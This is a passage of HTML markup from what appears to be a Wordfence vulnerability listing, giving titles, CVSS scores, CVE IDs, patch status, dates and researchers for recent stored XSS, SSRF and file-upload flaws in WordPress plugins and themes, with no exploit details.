				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pdf-embed-viewer" target="_blank" rel="noopener">Flipbook PDF Viewer &amp; Embedder</a> <span class="wfvr-software-slug">[pdf-embed-viewer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e8865a30-ecff-439b-ab96-4dba018046ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0fe57abe-4354-46de-a742-d86722c381d8" target="_blank" rel="noopener">AffiliateX – Amazon Affiliate Plugin, Product Boxes, Comparison Tables &amp; Affiliate Link Tracking &lt;= 2.3.5 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65558" target="_blank" rel="noopener noreferrer">							CVE-2026-65558						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliatex" target="_blank" rel="noopener">AffiliateX – Amazon Affiliate Plugin, Product Boxes, Comparison Tables &amp; Affiliate Link Tracking</a> <span class="wfvr-software-slug">[affiliatex]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0fe57abe-4354-46de-a742-d86722c381d8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/19e48549-8a28-4626-b0b5-b781cd01fa5b" target="_blank" rel="noopener">ARforms &lt;= 7.2.1 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;password&#8217; Field Values</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12421" target="_blank" rel="noopener noreferrer">							CVE-2026-12421						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/arforms" target="_blank" rel="noopener">ARforms</a> <span class="wfvr-software-slug">[arforms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc-huynh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/33af58759a2231f0c6ffdafd84ba15df.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33af58759a2231f0c6ffdafd84ba15df"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc-huynh" target="_blank" rel="noopener">Luc Huynh from Noventiq RedTeam</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/19e48549-8a28-4626-b0b5-b781cd01fa5b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61a4aea3-88a0-428c-8eba-78c9c3397ac9" target="_blank" rel="noopener">Dokan Pro &lt;= 5.0.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65492" target="_blank" rel="noopener noreferrer">							CVE-2026-65492						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-pro" target="_blank" rel="noopener">Dokan Pro</a> <span class="wfvr-software-slug">[dokan-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61a4aea3-88a0-428c-8eba-78c9c3397ac9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87f7b9c3-f3aa-4ace-ab67-c32fa92fcffe" target="_blank" rel="noopener">Dynamic Pricing With Discount Rules for WooCommerce &lt;= 4.5.11 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59556" target="_blank" rel="noopener noreferrer">							CVE-2026-59556						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/aco-woo-dynamic-pricing" target="_blank" rel="noopener">Dynamic Pricing With Discount Rules for WooCommerce</a> <span class="wfvr-software-slug">[aco-woo-dynamic-pricing]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denny-abraham-sinaga" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a2666d41644bed51ac48fbdad00e2874.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a2666d41644bed51ac48fbdad00e2874"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denny-abraham-sinaga" target="_blank" rel="noopener">Denny Abraham Sinaga</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/87f7b9c3-f3aa-4ace-ab67-c32fa92fcffe" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af187180-0f10-4fc0-8376-0e224a44d7eb" target="_blank" rel="noopener">Easy Form Builder by WhiteStudio – Drag &amp; Drop Form Builder &lt;= 4.0.12 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59517" target="_blank" rel="noopener noreferrer">							CVE-2026-59517						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-form-builder" target="_blank" rel="noopener">Easy Form Builder by WhiteStudio – Drag &amp; Drop Form Builder</a> <span class="wfvr-software-slug">[easy-form-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af187180-0f10-4fc0-8376-0e224a44d7eb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6b30089a-2267-47b9-b0a5-d6eeadfe51d2" target="_blank" rel="noopener">FormCraft &lt;= 3.9.14 &#8211; Unauthenticated Stored Cross-Site Scripting via Matrix Field Sub-Parameters</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7232" target="_blank" rel="noopener noreferrer">							CVE-2026-7232						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formcraft3" target="_blank" rel="noopener">FormCraft</a> <span class="wfvr-software-slug">[formcraft3]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc-huynh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/33af58759a2231f0c6ffdafd84ba15df.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33af58759a2231f0c6ffdafd84ba15df"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc-huynh" target="_blank" rel="noopener">Luc Huynh from Noventiq RedTeam</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6b30089a-2267-47b9-b0a5-d6eeadfe51d2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eea05676-aa24-4f60-9a8c-716b8a051be6" target="_blank" rel="noopener">JetBooking &lt;= 4.1.2 &#8211; Authenticated (Custom+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65466" target="_blank" rel="noopener noreferrer">							CVE-2026-65466						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-booking" target="_blank" rel="noopener">JetBooking</a> <span class="wfvr-software-slug">[jet-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eea05676-aa24-4f60-9a8c-716b8a051be6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/97e68562-92b8-43ac-9a8c-778d2b61f889" target="_blank" rel="noopener">Mailster &#8211; Email Newsletter Plugin for WordPress &lt;= 4.1.17 &#8211; Authenticated (Editor+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27064" target="_blank" rel="noopener noreferrer">							CVE-2026-27064						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailster" target="_blank" rel="noopener">Mailster WordPress Newsletter Plugin</a> <span class="wfvr-software-slug">[mailster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/97e68562-92b8-43ac-9a8c-778d2b61f889" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8f1e3c0d-3b67-40e8-b233-e23e257982f4" target="_blank" rel="noopener">Manual &#8211; Documentation, Knowledge Base &amp; Education WordPress &lt;= 7.5.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65511" target="_blank" rel="noopener noreferrer">							CVE-2026-65511						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/manual" target="_blank" rel="noopener">Manual &#8211; Documentation, Knowledge Base &amp; Education WordPress Theme</a> <span class="wfvr-software-slug">[manual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ed32dll" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ed32dll" target="_blank" rel="noopener">ed32.dll</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8f1e3c0d-3b67-40e8-b233-e23e257982f4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6c6bc841-a168-475e-941b-a877a3a401f9" target="_blank" rel="noopener">MapSVG – Vector maps, Image maps, Google Maps &lt;= 8.14.0 &#8211; Authenticated (Admin+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65455" target="_blank" rel="noopener noreferrer">							CVE-2026-65455						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapsvg-lite-interactive-vector-maps" target="_blank" rel="noopener">MapSVG – Vector maps, Image maps, Google Maps</a> <span class="wfvr-software-slug">[mapsvg-lite-interactive-vector-maps]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/securepeak-research-team" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d1466fe98314dea2ebe93e44e7cc3b9c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1466fe98314dea2ebe93e44e7cc3b9c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/securepeak-research-team" target="_blank" rel="noopener">Securepeak Research Team</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6c6bc841-a168-475e-941b-a877a3a401f9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c7f098b9-eca3-41c7-9c74-0f4b3f75c915" target="_blank" rel="noopener">MapSVG &lt;= 8.14.0 &#8211; Authenticated (Administrator+) Arbitrary File Upload via &#8216;/mapsvg/v1/svgfile&#8217; Endpoint</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1771" target="_blank" rel="noopener noreferrer">							CVE-2026-1771						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mapsvg-lite-interactive-vector-maps" target="_blank" rel="noopener">MapSVG – Vector maps, Image maps, Google Maps</a> <span class="wfvr-software-slug">[mapsvg-lite-interactive-vector-maps]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/a1" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/08527e440d77f24880a4d8811a7f8d7d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="08527e440d77f24880a4d8811a7f8d7d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/a1" target="_blank" rel="noopener">san6051</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c7f098b9-eca3-41c7-9c74-0f4b3f75c915" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ec2276d6-431f-428c-b1d1-3acbd60e0505" target="_blank" rel="noopener">PeproDev Ultimate Invoice &lt;= 2.2.6 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65516" target="_blank" rel="noopener noreferrer">							CVE-2026-65516						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pepro-ultimate-invoice" target="_blank" rel="noopener">PeproDev Ultimate Invoice</a> <span class="wfvr-software-slug">[pepro-ultimate-invoice]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/longnv719" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2127a5367121b7fc0cae0ac782c9baf1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2127a5367121b7fc0cae0ac782c9baf1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/longnv719" target="_blank" rel="noopener">longnv719</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ec2276d6-431f-428c-b1d1-3acbd60e0505" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a9f6ab26-f4e4-4774-8663-d003efe27762" target="_blank" rel="noopener">PeproDev Ultimate Invoice &lt;= 2.2.6 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65510" target="_blank" rel="noopener noreferrer">							CVE-2026-65510						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pepro-ultimate-invoice" target="_blank" rel="noopener">PeproDev Ultimate Invoice</a> <span class="wfvr-software-slug">[pepro-ultimate-invoice]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d1f39a6f73f4287f8e67a2fe1f852ba7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d1f39a6f73f4287f8e67a2fe1f852ba7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hhhai" target="_blank" rel="noopener">hhhai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a9f6ab26-f4e4-4774-8663-d003efe27762" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/be1bc322-1d42-4e33-adff-dbe706bb9f58" target="_blank" rel="noopener">PiWeb Product Enquiry or product catalog for WooCommerce &lt;= 2.2.34.43 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59512" target="_blank" rel="noopener noreferrer">							CVE-2026-59512						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
